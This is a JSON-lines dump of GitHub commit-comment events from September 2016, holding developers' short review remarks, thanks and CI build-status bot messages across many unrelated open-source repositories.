{"id":"4530838522","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18937497,"position":null,"line":null,"path":null,"commit_id":"9a8a4810389de03b7535d1237acabac6d6e03614","created_at":"2016-09-07T23:09:59Z","updated_at":"2016-09-07T23:09:59Z","body":"thank you"}},"created_at":"2016-09-07T23:09:59Z"}
{"id":"4530839879","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"99taxis/aws-kibana-proxy"},"payload":{"comment":{"id":18937500,"position":null,"line":null,"path":null,"commit_id":"764858389fd484240067d6d740aa60c0f5b6fa45","created_at":"2016-09-07T23:10:22Z","updated_at":"2016-09-07T23:10:22Z","body":"Excellent idea, thx!"}},"created_at":"2016-09-07T23:10:22Z"}
{"id":"4530840817","type":"CommitCommentEvent","actor":{"login":"iogf"},"repo":{"name":"iogf/snip.bash"},"payload":{"comment":{"id":18937502,"position":5,"line":493,"path":"templates_bash/tests.sh","commit_id":"43dc356ab4d0e0254d61b5596531414e971cd6bf","created_at":"2016-09-07T23:10:38Z","updated_at":"2016-09-07T23:10:38Z","body":":P"}},"created_at":"2016-09-07T23:10:38Z"}
{"id":"4530841630","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18937505,"position":null,"line":null,"path":null,"commit_id":"9a8a4810389de03b7535d1237acabac6d6e03614","created_at":"2016-09-07T23:10:51Z","updated_at":"2016-09-07T23:10:51Z","body":"also i'm been thinking about how to do muiltplayer"}},"created_at":"2016-09-07T23:10:51Z"}
{"id":"4530845764","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/artwork-201620-1"},"payload":{"comment":{"id":18937517,"position":1,"line":1,"path":"sonar-project.properties","commit_id":"c4558ba873b0b56ed78c514d1c9f18f155c6cb50","created_at":"2016-09-07T23:12:01Z","updated_at":"2016-09-07T23:12:01Z","body":"recomendado eliminar este archivo. La configuración por defecto de sonar está en los pom.xml"}},"created_at":"2016-09-07T23:12:01Z"}
{"id":"4530846875","type":"CommitCommentEvent","actor":{"login":"dusenberrymw"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":18937522,"position":12,"line":65,"path":"src/main/python/systemml/defmatrix.py","commit_id":"e23acf71f3a31448f98ce78baffea23ccc69751c","created_at":"2016-09-07T23:12:19Z","updated_at":"2016-09-07T23:12:19Z","body":"If this shouldn't be used by an end user, just change the name to `_printAST`."}},"created_at":"2016-09-07T23:12:19Z"}
{"id":"4530848014","type":"CommitCommentEvent","actor":{"login":"dusenberrymw"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":18937526,"position":72,"line":519,"path":"src/main/python/systemml/defmatrix.py","commit_id":"e23acf71f3a31448f98ce78baffea23ccc69751c","created_at":"2016-09-07T23:12:39Z","updated_at":"2016-09-07T23:12:39Z","body":"Python 2 syntax -- I'll push a hotfix to change it to `print(out)`."}},"created_at":"2016-09-07T23:12:39Z"}
{"id":"4530848772","type":"CommitCommentEvent","actor":{"login":"diasdavid"},"repo":{"name":"libp2p/js-libp2p-swarm"},"payload":{"comment":{"id":18937529,"position":null,"line":null,"path":null,"commit_id":"0f41df1d6fda0bf3d1a38d9408333a43f5526ec5","created_at":"2016-09-07T23:12:51Z","updated_at":"2016-09-07T23:12:51Z","body":"ah, bad git commit --amend :( "}},"created_at":"2016-09-07T23:12:51Z"}
{"id":"4530850101","type":"CommitCommentEvent","actor":{"login":"drigz"},"repo":{"name":"drigz/scratch-blocks"},"payload":{"comment":{"id":18937535,"position":14,"line":235,"path":"core/blockly.js","commit_id":"27c2e8c4ade15161e6ee2f78bcb1a7e1a611d1e0","created_at":"2016-09-07T23:13:15Z","updated_at":"2016-09-07T23:13:15Z","body":"If the event has been created by a split, it doesn't contain a real\nTouchList, instead it has a JavaScript Array. This will throw because it\ndoesn't have an item() method.\n\nThe try/catch could probably be avoided by using initTouchEvent for old\nChrome, or by converting all touch events to JS objects (not just\nmultitouch events).\n\nAm 08.09.2016 01:04 schrieb \"Rachel Fenichel\" <notifications@github.com>:\n\n> What is this try-catch fixing? I'm incorporating these changes into my PR.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/drigz/scratch-blocks/commit/27c2e8c4ade15161e6ee2f78bcb1a7e1a611d1e0#commitcomment-18937433>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAmlj9Tag0Y9wgklj4btwcb6nU-UCZlTks5qn0MFgaJpZM4J3cmq>\n> .\n>\n"}},"created_at":"2016-09-07T23:13:15Z"}
{"id":"4530852502","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18937542,"position":null,"line":null,"path":null,"commit_id":"8e1a56e8d1134094c109e3321748285bf9337688","created_at":"2016-09-07T23:13:54Z","updated_at":"2016-09-07T23:13:54Z","body":"did #32 "}},"created_at":"2016-09-07T23:13:54Z"}
{"id":"4530853572","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18937546,"position":null,"line":null,"path":null,"commit_id":"35c5ec4943db6176f1a05dd15315c10d381f6e08","created_at":"2016-09-07T23:14:13Z","updated_at":"2016-09-07T23:14:13Z","body":"did #20 \r\ndid #32 "}},"created_at":"2016-09-07T23:14:13Z"}
{"id":"4530854710","type":"CommitCommentEvent","actor":{"login":"casualjim"},"repo":{"name":"vmware/photon"},"payload":{"comment":{"id":18937549,"position":5,"line":37,"path":"SPECS/distrib-compat/ifup","commit_id":"ac13926b65cfea873da5c0fe02db285656099f68","created_at":"2016-09-07T23:14:34Z","updated_at":"2016-09-07T23:14:34Z","body":"the change is a mispelling"}},"created_at":"2016-09-07T23:14:34Z"}
{"id":"4530856055","type":"CommitCommentEvent","actor":{"login":"SAC-CS112-Robyn-Greene"},"repo":{"name":"SAC-CS112-Robyn-Greene/HelloWorld"},"payload":{"comment":{"id":18937553,"position":null,"line":null,"path":null,"commit_id":"aa6a60ea03361b0e9f87cd1a74c9d7e4335a531c","created_at":"2016-09-07T23:14:56Z","updated_at":"2016-09-07T23:14:56Z","body":"Add collaborator Professor Huynh"}},"created_at":"2016-09-07T23:14:56Z"}
{"id":"4530861322","type":"CommitCommentEvent","actor":{"login":"silver13"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18937569,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-07T23:16:24Z","updated_at":"2016-09-07T23:16:24Z","body":"I'm not sure what you mean, the screen looks like this:\r\nhttp://www.rcgroups.com/forums/showpost.php?p=35385664&postcount=4031"}},"created_at":"2016-09-07T23:16:24Z"}
{"id":"4530864160","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18937576,"position":null,"line":null,"path":null,"commit_id":"a29f09e94d24fe12d00debfcb6e7830970536114","created_at":"2016-09-07T23:17:12Z","updated_at":"2016-09-07T23:17:12Z","body":"Congrats!"}},"created_at":"2016-09-07T23:17:12Z"}
{"id":"4530870097","type":"CommitCommentEvent","actor":{"login":"Federico-leites"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18937583,"position":2,"line":7,"path":"sdlAdventures/Game.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T23:18:50Z","updated_at":"2016-09-07T23:18:50Z","body":"por lo pronto pase los destructores del renderer y window a la funcion clean para al menos librerar eso hasta que decida volver atras con lo del singleton"}},"created_at":"2016-09-07T23:18:50Z"}
{"id":"4530871775","type":"CommitCommentEvent","actor":{"login":"corecode"},"repo":{"name":"corecode/fabric"},"payload":{"comment":{"id":18937587,"position":5,"line":30,"path":"consensus/simplebft/viewchange.go","commit_id":"365562e02ebeadb69a5b88e341c9083fb2d2ffa5","created_at":"2016-09-07T23:19:20Z","updated_at":"2016-09-07T23:19:20Z","body":"Yea I wasn't sure.  Can Q ever contain more than one?\n\nOn 09/07/2016 08:21 PM, Kostas Christidis wrote:\n>\n> Not sure why you switched to a slice here? As you have noted as well,\n> your P and Q structs will hold one item now that you're dropping\n> watermarks.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/corecode/fabric/commit/365562e02ebeadb69a5b88e341c9083fb2d2ffa5#commitcomment-18932852>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAK3O-FHzDD7_Il7UYN3q21JDTqS3Psgks5qnwCTgaJpZM4J3Niq>.\n>\n\n\n"}},"created_at":"2016-09-07T23:19:20Z"}
{"id":"4530873949","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18937598,"position":null,"line":null,"path":null,"commit_id":"bea2bf5de9b866c52a44b903bf0f7f3a57713c56","created_at":"2016-09-07T23:19:57Z","updated_at":"2016-09-07T23:19:57Z","body":"did #20 "}},"created_at":"2016-09-07T23:19:57Z"}
{"id":"4530884388","type":"CommitCommentEvent","actor":{"login":"russelltg"},"repo":{"name":"gentlemans/gentlemanly_engine"},"payload":{"comment":{"id":18937621,"position":null,"line":null,"path":null,"commit_id":"7e241f25dfa49ea992fbe90bb760521082317ac6","created_at":"2016-09-07T23:22:39Z","updated_at":"2016-09-07T23:22:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;rLcN73DX&#x2F;43-update-current-core-things-to-use-subsystems\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Update current core things to use subsystems</a>"}},"created_at":"2016-09-07T23:22:39Z"}
{"id":"4530884596","type":"CommitCommentEvent","actor":{"login":"sks"},"repo":{"name":"wesofficial/learn-ruby-the-hard-way"},"payload":{"comment":{"id":18937622,"position":null,"line":null,"path":null,"commit_id":"900b0ae41ddf1aa4908f56300436da9ef817dea0","created_at":"2016-09-07T23:22:43Z","updated_at":"2016-09-07T23:22:43Z","body":"This is not acceptable !.\r\n\r\nWhere is the test ?\r\n\r\nDude, Not cool \r\n\r\n@kkallday & @sks"}},"created_at":"2016-09-07T23:22:43Z"}
{"id":"4530886749","type":"CommitCommentEvent","actor":{"login":"ummcheng"},"repo":{"name":"minervaproject/licode"},"payload":{"comment":{"id":18937623,"position":54,"line":61,"path":"erizo_controller/erizoClient/src/Connection.js","commit_id":"ea7583af95efd54f3f5bd0d1fa9d6bd44e6fc3b8","created_at":"2016-09-07T23:23:20Z","updated_at":"2016-09-07T23:23:20Z","body":"Hm ... I was thinking that none of them match up with what the browser is, and wanted to fix it, but I now see that it could potentially cause an issue with `Erizo.Connection`. Will revert and let someone who knows better patch :)"}},"created_at":"2016-09-07T23:23:20Z"}
{"id":"4530900303","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18937652,"position":null,"line":null,"path":null,"commit_id":"fa1bffa4a1d396306c2286bb2ceeaf184afb78d4","created_at":"2016-09-07T23:26:56Z","updated_at":"2016-09-07T23:26:56Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T23:26:56Z"}
{"id":"4530900794","type":"CommitCommentEvent","actor":{"login":"tonyandrewmeyer"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":18937654,"position":129,"line":129,"path":"application.py","commit_id":"4dc8ec384980dfe22865ef29510d7053b98b0a37","created_at":"2016-09-07T23:27:04Z","updated_at":"2016-09-07T23:27:04Z","body":"Actually, Slack tells you to not do that, right?"}},"created_at":"2016-09-07T23:27:04Z"}
{"id":"4530904814","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18937659,"position":null,"line":null,"path":null,"commit_id":"fa1bffa4a1d396306c2286bb2ceeaf184afb78d4","created_at":"2016-09-07T23:28:11Z","updated_at":"2016-09-07T23:28:11Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T23:28:11Z"}
{"id":"4530910618","type":"CommitCommentEvent","actor":{"login":"Federico-leites"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18937678,"position":20,"line":21,"path":"sdlAdventures/Game.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T23:29:48Z","updated_at":"2016-09-07T23:29:48Z","body":"ahi los agregue al metodo clean."}},"created_at":"2016-09-07T23:29:48Z"}
{"id":"4530917746","type":"CommitCommentEvent","actor":{"login":"Federico-leites"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18937693,"position":2,"line":4,"path":"sdlAdventures/Main.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T23:31:48Z","updated_at":"2016-09-07T23:31:48Z","body":"ya no se usa mas despues de que ahora es singleton, por ahora...."}},"created_at":"2016-09-07T23:31:48Z"}
{"id":"4530924986","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18937715,"position":null,"line":null,"path":null,"commit_id":"fa1bffa4a1d396306c2286bb2ceeaf184afb78d4","created_at":"2016-09-07T23:33:44Z","updated_at":"2016-09-07T23:33:44Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T23:33:44Z"}
{"id":"4530929293","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"plone/buildout.coredev"},"payload":{"comment":{"id":18937726,"position":null,"line":null,"path":null,"commit_id":"052b3823959b9de68069403c61a737c0ca23b1bc","created_at":"2016-09-07T23:34:55Z","updated_at":"2016-09-07T23:34:55Z","body":"I wanted to do this as a pull request, but got confused. Should be fine though. And I am expecting a new Zope2 release soon."}},"created_at":"2016-09-07T23:34:55Z"}
{"id":"4530936444","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18937736,"position":null,"line":null,"path":null,"commit_id":"dd98b6fb9f35544201ed66733af40ff822ba8c36","created_at":"2016-09-07T23:36:59Z","updated_at":"2016-09-07T23:36:59Z","body":"@aszlig Setting up `/run` explicitly was easy and fixed my problem, so I'm good with this commit."}},"created_at":"2016-09-07T23:36:59Z"}
{"id":"4530936520","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18937737,"position":null,"line":null,"path":null,"commit_id":"2ec4045824139e2b092abaf1bc04e6b355e00b20","created_at":"2016-09-07T23:37:00Z","updated_at":"2016-09-07T23:37:00Z","body":"Command line testing with Visual Studio 2003 and `nmake` dumped so many \"could not generate a default copy-constructor\" I thought it was 2004...."}},"created_at":"2016-09-07T23:37:00Z"}
{"id":"4530946632","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18937753,"position":null,"line":null,"path":null,"commit_id":"fa1bffa4a1d396306c2286bb2ceeaf184afb78d4","created_at":"2016-09-07T23:39:58Z","updated_at":"2016-09-07T23:39:58Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T23:39:58Z"}
{"id":"4530953094","type":"CommitCommentEvent","actor":{"login":"trixpan"},"repo":{"name":"apache/nifi"},"payload":{"comment":{"id":18937764,"position":66,"line":66,"path":"nifi-nar-bundles/nifi-standard-bundle/nifi-standard-processors/src/main/resources/docs/org.apache.nifi.processors.standard.TailFile/additionalDetails.html","commit_id":"68a4d440ea62e0ba624fd975879cedb1b6a61d00","created_at":"2016-09-07T23:41:50Z","updated_at":"2016-09-07T23:41:50Z","body":"This example is a bit confusing as having a date within the filename would almost certainly suggest a dynamic file name is in place. \r\n\r\nPerhaps filename should be /my/path/directory/my-app.log.0\r\n? \r\nThis would match widely used file  rotation naming convenientions"}},"created_at":"2016-09-07T23:41:50Z"}
{"id":"4530953668","type":"CommitCommentEvent","actor":{"login":"swhp"},"repo":{"name":"NanoDesuTranslations/editor"},"payload":{"comment":{"id":18937766,"position":null,"line":null,"path":null,"commit_id":"f466994fb12dd2460c3434ad6e5f77c1bbc529c8","created_at":"2016-09-07T23:42:01Z","updated_at":"2016-09-07T23:42:01Z","body":"@DerekRS  Please make this code be like this in master branch. So when @nanodesutl deploy the editor is already in production mode."}},"created_at":"2016-09-07T23:42:01Z"}
{"id":"4530953690","type":"CommitCommentEvent","actor":{"login":"zwacky"},"repo":{"name":"zwacky/pokedex-go"},"payload":{"comment":{"id":18937767,"position":null,"line":null,"path":null,"commit_id":"aedd6921973a78353285c736973411d4af80d5ff","created_at":"2016-09-07T23:42:02Z","updated_at":"2016-09-07T23:42:02Z","body":"fixes #5 "}},"created_at":"2016-09-07T23:42:02Z"}
{"id":"4530956486","type":"CommitCommentEvent","actor":{"login":"dchiu911"},"repo":{"name":"OVCARE/nanostringr"},"payload":{"comment":{"id":18937772,"position":33,"line":22,"path":"R/HKnorm.R","commit_id":"bf9eed63f53d431b7f482686bd9210708a86fb15","created_at":"2016-09-07T23:42:50Z","updated_at":"2016-09-07T23:42:50Z","body":"Are the `is.logged` cases reversed? #4 "}},"created_at":"2016-09-07T23:42:50Z"}
{"id":"4530956754","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18937773,"position":null,"line":null,"path":null,"commit_id":"fa1bffa4a1d396306c2286bb2ceeaf184afb78d4","created_at":"2016-09-07T23:42:54Z","updated_at":"2016-09-07T23:42:54Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa1bffa4a1d396306c2286bb2ceeaf184afb78d4-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T23:42:54Z"}
{"id":"4530963273","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":18937791,"position":null,"line":null,"path":null,"commit_id":"c1928da756ce72f29ec344aed4c1228802284120","created_at":"2016-09-07T23:44:50Z","updated_at":"2016-09-07T23:44:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OumC35uoShabDZJRD6PQJw"}},"created_at":"2016-09-07T23:44:50Z"}
{"id":"4530970412","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18937802,"position":null,"line":null,"path":null,"commit_id":"0a2141f8cf0065e8978e99c0e09f7c8e8d2b3833","created_at":"2016-09-07T23:46:59Z","updated_at":"2016-09-07T23:46:59Z","body":"++"}},"created_at":"2016-09-07T23:46:59Z"}
{"id":"4530975526","type":"CommitCommentEvent","actor":{"login":"shalako"},"repo":{"name":"cloudfoundry/docs-cf-admin"},"payload":{"comment":{"id":18937813,"position":10,"line":10,"path":"supporting-websockets.html.md.erb","commit_id":"44b1d0a5c562321b0c29a716b36158d54106ecaa","created_at":"2016-09-07T23:48:34Z","updated_at":"2016-09-07T23:48:34Z","body":"Also, your developers won't be able to use websockets with their applications."}},"created_at":"2016-09-07T23:48:34Z"}
{"id":"4530980725","type":"CommitCommentEvent","actor":{"login":"shalako"},"repo":{"name":"cloudfoundry/docs-cf-admin"},"payload":{"comment":{"id":18937816,"position":14,"line":14,"path":"supporting-websockets.html.md.erb","commit_id":"44b1d0a5c562321b0c29a716b36158d54106ecaa","created_at":"2016-09-07T23:50:12Z","updated_at":"2016-09-07T23:50:12Z","body":"The port isn't necessarily 80. It depends on how the operator has configured their LBs. "}},"created_at":"2016-09-07T23:50:12Z"}
{"id":"4530981390","type":"CommitCommentEvent","actor":{"login":"AlineTalhouk"},"repo":{"name":"OVCARE/nanostringr"},"payload":{"comment":{"id":18937817,"position":33,"line":22,"path":"R/HKnorm.R","commit_id":"bf9eed63f53d431b7f482686bd9210708a86fb15","created_at":"2016-09-07T23:50:21Z","updated_at":"2016-09-07T23:50:21Z","body":"this seems fine to me Derek. If is.logged=TRUE means that the data was already log transformed, but if it is false then you need to log-transform it. does that make sense?"}},"created_at":"2016-09-07T23:50:21Z"}
{"id":"4530982112","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/artwork-201620-1"},"payload":{"comment":{"id":18937818,"position":60,"line":60,"path":"artwork-api/src/main/java/co/edu/uniandes/csw/artwork/resources/QualificationResource.java","commit_id":"65527c4612efe897eea79adcba3bf9860a8107ed","created_at":"2016-09-07T23:50:35Z","updated_at":"2016-09-07T23:50:35Z","body":"Qualitfication resource no requiere estas constantes"}},"created_at":"2016-09-07T23:50:35Z"}
{"id":"4530984587","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/artwork-201620-1"},"payload":{"comment":{"id":18937820,"position":60,"line":60,"path":"artwork-api/src/main/java/co/edu/uniandes/csw/artwork/resources/QualificationResource.java","commit_id":"65527c4612efe897eea79adcba3bf9860a8107ed","created_at":"2016-09-07T23:51:21Z","updated_at":"2016-09-07T23:51:21Z","body":"No requiere todas las constantes"}},"created_at":"2016-09-07T23:51:21Z"}
{"id":"4530985845","type":"CommitCommentEvent","actor":{"login":"mikejbrown"},"repo":{"name":"git/git"},"payload":{"comment":{"id":18937822,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2016-09-07T23:51:42Z","updated_at":"2016-09-07T23:51:42Z","body":":open_mouth: :clap: :tada: "}},"created_at":"2016-09-07T23:51:42Z"}
{"id":"4530986736","type":"CommitCommentEvent","actor":{"login":"mauricetmeyer"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18937824,"position":null,"line":null,"path":null,"commit_id":"1892889d0bc737af49dbeb1b73d0db304cbd09a5","created_at":"2016-09-07T23:52:00Z","updated_at":"2016-09-07T23:52:00Z","body":"![img_3165](https://cloud.githubusercontent.com/assets/17762773/18332425/c90b21f0-7566-11e6-9909-a0904b30f497.JPG)"}},"created_at":"2016-09-07T23:52:00Z"}
{"id":"4530987005","type":"CommitCommentEvent","actor":{"login":"shalako"},"repo":{"name":"cloudfoundry/docs-cf-admin"},"payload":{"comment":{"id":18937825,"position":18,"line":18,"path":"supporting-websockets.html.md.erb","commit_id":"44b1d0a5c562321b0c29a716b36158d54106ecaa","created_at":"2016-09-07T23:52:04Z","updated_at":"2016-09-07T23:52:04Z","body":"I think what is missing here is that the CLI (probably AppsMgr, too?) establishes a websocket connection with traffic controller (I think?) in order to stream app logs. "}},"created_at":"2016-09-07T23:52:04Z"}
{"id":"4530988069","type":"CommitCommentEvent","actor":{"login":"BlackFuse"},"repo":{"name":"thommoboy/There-are-no-brakes"},"payload":{"comment":{"id":18937826,"position":null,"line":null,"path":null,"commit_id":"130361436f2a2bbd54b0b78ef998e2131999d126","created_at":"2016-09-07T23:52:23Z","updated_at":"2016-09-07T23:52:23Z","body":"Controller input at menu and pause panel\r\nMenu bug fix(can't start game)\r\nGrappling section can be solved with seesaw alone\r\nIndustrial Character facing the wrong direction in Pyramid levelPulley in tutorial adventurer level can push player through the floor\r\ncamera zoom as TOGGLE rather than hold\r\nSkull now needs to hold the pressure plate to keep the crucifix inside the wall\r\nwings on game complete screen lost texture (pink)\r\nPlayer2 cannot move when using the door in Pyramid level now"}},"created_at":"2016-09-07T23:52:23Z"}
{"id":"4530988381","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18937827,"position":18,"line":83,"path":"HarvestMap/DB/HarvestDbController.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-07T23:52:29Z","updated_at":"2016-09-07T23:52:29Z","body":"Why do you need nested modules?\r\nTry to design graph of dependencies between modules. Yes, I know the there is no limitations in Lua, JavaScript and other languages, but if you have cyclic dependencies - it may cause a lot of issue with debug and complicate understanding of code.\r\n\r\nWhat I changed - I've tried to make small utils modules without any dependecies (no nesting - no requirements, only global package which should be initialized first and can be used everywhere).\r\nBut if you want to make debugUtils as nested module of Harvest module - then I have a question about chicken and Egg: Who must initialize Harvest root table? What if you want to use some method from debug utils during intialization of Harvest (static part of module)?"}},"created_at":"2016-09-07T23:52:29Z"}
{"id":"4530994552","type":"CommitCommentEvent","actor":{"login":"shalako"},"repo":{"name":"cloudfoundry/docs-cf-admin"},"payload":{"comment":{"id":18937836,"position":30,"line":30,"path":"supporting-websockets.html.md.erb","commit_id":"44b1d0a5c562321b0c29a716b36158d54106ecaa","created_at":"2016-09-07T23:54:22Z","updated_at":"2016-09-07T23:54:22Z","body":"capitalize the headers: X-Forwarded-For and X-Forwarded-Proto"}},"created_at":"2016-09-07T23:54:22Z"}
{"id":"4530997161","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18937842,"position":52,"line":907,"path":"HarvestMap/DB/HarvestMapDB.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-07T23:55:07Z","updated_at":"2016-09-07T23:55:07Z","body":"And here you are not using nesting? What is the main idea? All modules are nested modules of Harvest? Or with some exclusions? What is the rule?"}},"created_at":"2016-09-07T23:55:07Z"}
{"id":"4531000301","type":"CommitCommentEvent","actor":{"login":"SteveBurkettNZ"},"repo":{"name":"Azure/azure-powershell"},"payload":{"comment":{"id":18937849,"position":null,"line":null,"path":null,"commit_id":"944786596d6afe9ad8fb857e9ea1e5126eab891a","created_at":"2016-09-07T23:55:58Z","updated_at":"2016-09-07T23:55:58Z","body":"Typo for **already** there, as well as in the Write-Error line below it."}},"created_at":"2016-09-07T23:55:58Z"}
{"id":"4531004075","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18937862,"position":113,"line":184,"path":"HarvestMap/Event/HarvestEvents.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-07T23:57:09Z","updated_at":"2016-09-07T23:57:09Z","body":"Looks like it can work without such complicated logic. Just check latest content of pull request."}},"created_at":"2016-09-07T23:57:09Z"}
